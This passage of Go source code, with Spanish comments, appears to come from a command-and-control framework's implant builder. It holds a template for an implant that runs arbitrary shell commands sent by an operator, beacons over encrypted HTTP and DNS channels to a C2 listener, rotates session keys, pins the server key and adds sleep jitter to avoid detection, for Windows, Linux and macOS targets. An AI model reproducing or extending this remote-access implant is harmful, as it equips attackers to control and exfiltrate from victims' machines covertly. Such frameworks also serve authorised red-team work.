		return fmt.Errorf("ServerPubKey malformada: %w", err)
	}
	if !bytes.Equal(serverPub.Bytes(), pinned.Bytes()) {
		return fmt.Errorf("server pubkey no coincide con la pinnada")
	}
	return nil
}

func executeTask(command string, args []string) ([]byte, string) {
	switch command {
	case "shell":
		if len(args) == 0 {
			return nil, "sin argumentos"
		}
		var cmd *exec.Cmd
		if runtime.GOOS == "windows" {
			cmd = exec.Command("cmd.exe", "/C", args[0])
		} else {
			cmd = exec.Command("/bin/sh", "-c", args[0])
		}
		out, err := cmd.CombinedOutput()
		if err != nil {
			return out, err.Error()
		}
		return out, ""
	case "terminate":
		os.Exit(0)
		return nil, ""
	default:
		return nil, fmt.Sprintf("comando desconocido: %s", command)
	}
}

func handleRekeyRequestHTTP(
	profile *profiles.Profile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	debugLog("rekey HTTP: descifrando server_eph_pub")
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	debugLog("rekey HTTP: generando par efímero")
	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	// Responder BAJO CLAVES VIEJAS.
	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)
	resBytes, _ := resEnv.Marshal()

	httpReq, err := http.NewRequest("POST", ListenerURL, bytes.NewReader(resBytes))
	if err != nil {
		return err
	}
	profile.ApplyHeaders(httpReq)
	httpReq.Header.Set("Content-Type", "application/octet-stream")

	debugLog("rekey HTTP: enviando implant_eph_pub")
	client, err := newHTTPClient()
	if err != nil {
		return fmt.Errorf("crear http client: %w", err)
	}
	resp2, err := client.Do(httpReq)
	if err != nil {
		return err
	}
	defer resp2.Body.Close()
	debugLog("rekey HTTP: respuesta HTTP %d", resp2.StatusCode)

	if resp2.StatusCode != http.StatusOK {
		_, _ = io.Copy(io.Discard, resp2.Body)
		return fmt.Errorf("rekey: server respondió %d", resp2.StatusCode)
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		_, _ = io.Copy(io.Discard, resp2.Body)
		return err
	}
	debugLog("rekey HTTP: rekey aplicado localmente, descifrando ack")

	body, err := io.ReadAll(resp2.Body)
	if err != nil {
		return fmt.Errorf("rekey: leer ack: %w", err)
	}
	respEnv, err := protocol.UnmarshalEnvelope(body)
	if err != nil {
		return fmt.Errorf("rekey: unmarshal ack: %w", err)
	}
	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("rekey: tipo de ack inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey HTTP: ack OK, rekey completo")

	return nil
}

// handleRekeyRequestDNS es el equivalente DNS de handleRekeyRequestHTTP.
func handleRekeyRequestDNS(
	profile *profiles.DNSProfile,
	implantID string,
	sc *crypto.SessionCrypto,
	encrypted []byte,
) error {
	debugLog("rekey DNS: descifrando server_eph_pub")
	serverEphPub, err := decodeServerEphPub(sc, encrypted)
	if err != nil {
		return err
	}

	debugLog("rekey DNS: generando par efímero")
	ephPriv, ephPub, err := crypto.GenerateKeyPair()
	if err != nil {
		return err
	}

	resp := map[string]string{
		"implant_eph_pub": base64.StdEncoding.EncodeToString(ephPub.Bytes()),
	}
	respJSON, _ := json.Marshal(resp)
	encResp, err := sc.EncryptForC2(respJSON, nil)
	if err != nil {
		return err
	}
	wrapper := protocol.EncryptedWrapper{ImplantID: implantID, Data: encResp}
	wrapJSON, _ := json.Marshal(wrapper)
	resEnv := protocol.NewEnvelope(protocol.MsgKeyRotation, wrapJSON)

	// Enviamos la respuesta bajo claves VIEJAS y obtenemos el ack.
	debugLog("rekey DNS: enviando implant_eph_pub")
	respEnv, err := exchangeDNS(profile, resEnv, implantID)
	if err != nil {
		return err
	}

	if err := sc.ApplyRekeyAsBeacon(ephPriv, serverEphPub); err != nil {
		return err
	}
	debugLog("rekey DNS: rekey aplicado localmente, descifrando ack")

	if respEnv.Type != protocol.MsgKeyRotation {
		return fmt.Errorf("dns rekey: tipo de ack inesperado: %d", respEnv.Type)
	}
	ack, err := sc.DecryptFromC2(respEnv.Payload, nil)
	if err != nil {
		return fmt.Errorf("dns rekey: descifrar ack: %w", err)
	}
	if string(ack) != "ok" {
		return fmt.Errorf("dns rekey: ack inesperado: %q", ack)
	}
	debugLog("rekey DNS: ack OK, rekey completo")

	return nil
}

// decodeServerEphPub descifra un payload MsgKeyRotation y devuelve la
// ephPub del server.
func decodeServerEphPub(sc *crypto.SessionCrypto, encrypted []byte) (*ecdh.PublicKey, error) {
	plaintext, err := sc.DecryptFromC2(encrypted, nil)
	if err != nil {
		return nil, err
	}
	var req struct {
		ServerEphPub string ` + "`json:\"server_eph_pub\"`" + `
	}
	if err := json.Unmarshal(plaintext, &req); err != nil {
		return nil, err
	}
	raw, err := base64.StdEncoding.DecodeString(req.ServerEphPub)
	if err != nil {
		return nil, err
	}
	return crypto.PublicKeyFromBytes(raw)
}

func sleepWithJitter() {
	if jitterPerc <= 0 {
		debugLog("sleep: %ds (sin jitter)", sleepSecs)
		time.Sleep(time.Duration(sleepSecs) * time.Second)
		return
	}
	jitter := big.NewInt(int64(sleepSecs * jitterPerc / 100))
	if jitter.Sign() <= 0 {
		debugLog("sleep: %ds (jitter 0)", sleepSecs)
		time.Sleep(time.Duration(sleepSecs) * time.Second)
		return
	}
	n, _ := rand.Int(rand.Reader, jitter)
	sleep := time.Duration(sleepSecs)*time.Second + time.Duration(n.Int64())*time.Second
	debugLog("sleep: %s (base %ds + jitter)", sleep, sleepSecs)
	time.Sleep(sleep)
}

// randomSessionKey genera un identificador corto (12 chars base36 ≈ 62 bits)
// que se usa como contexto HKDF en la derivación de claves y como
// session_key del implante en la DB.
func randomSessionKey() string {
	b := make([]byte, 12)
	rand.Read(b)
	const charset = "abcdefghijklmnopqrstuvwxyz0123456789"
	out := make([]byte, len(b))
	for i, v := range b {
		out[i] = charset[int(v)%len(charset)]
	}
	return string(out)
}

// silenciarWarnings evita que el compilador se queje si en alguna
// configuración de build no se usan estos símbolos. No tiene efecto
// en runtime.
var _ = errors.New
`

type TemplateData struct {
	BuildID         string
	BuiltAt         string
	GoBuildTag      string
	ListenerURL     string
	ProfileName     string
	ServerPubKey    string
	CACertPEMBase64 string
	SleepSecs       int
	JitterPerc      int
	Format          string
}

func RenderTemplate(cfg *BuildConfig) ([]byte, error) {
	tmpl, err := template.New("implant").Parse(implantTemplate)
	if err != nil {
		return nil, err
	}

	data := TemplateData{
		BuildID:         cfg.BuildID,
		BuiltAt:         cfg.CreatedAt.Format("2006-01-02 15:04:05"),
		GoBuildTag:      goBuildTag(cfg.TargetOS),
		ListenerURL:     cfg.ListenerURL,
		ProfileName:     cfg.ProfileName,
		ServerPubKey:    cfg.ServerPubKey,
		CACertPEMBase64: cfg.CACertPEMBase64,
		SleepSecs:       cfg.SleepSecs,
		JitterPerc:      cfg.JitterPerc,
		Format:          string(cfg.Format),
	}

	var buf bytes.Buffer
	if err := tmpl.Execute(&buf, data); err != nil {
		return nil, err
	}
	return buf.Bytes(), nil
}

func goBuildTag(os TargetOS) string {
	switch os {
	case TargetWindows:
		return "windows"
	case TargetLinux:
		return "linux"
	case TargetDarwin:
		return "darwin"
	default:
		return "ignore"
	}
}
